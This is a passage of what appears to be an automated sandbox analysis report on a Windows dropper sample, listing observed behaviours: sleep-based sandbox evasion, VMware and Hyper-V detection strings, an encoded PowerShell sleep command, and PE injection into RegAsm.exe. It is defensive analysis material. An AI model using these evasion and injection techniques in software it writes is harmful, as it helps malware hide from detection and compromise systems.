                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 1768Thread sleep count: 199 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 244Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 5736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5800Thread sleep count: 7238 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4652Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3348Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7238Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8921Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 60000Jump to behavior
                Source: powershell.exe, 00000001.00000002.412512179.0000000004EBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.412512179.0000000004EBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.530606213.0000000006A10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.516579808.0000000001529000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 415000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4A0000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 967008Jump to behavior
                Encrypted powershell cmdline option found
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-DateJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -pJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
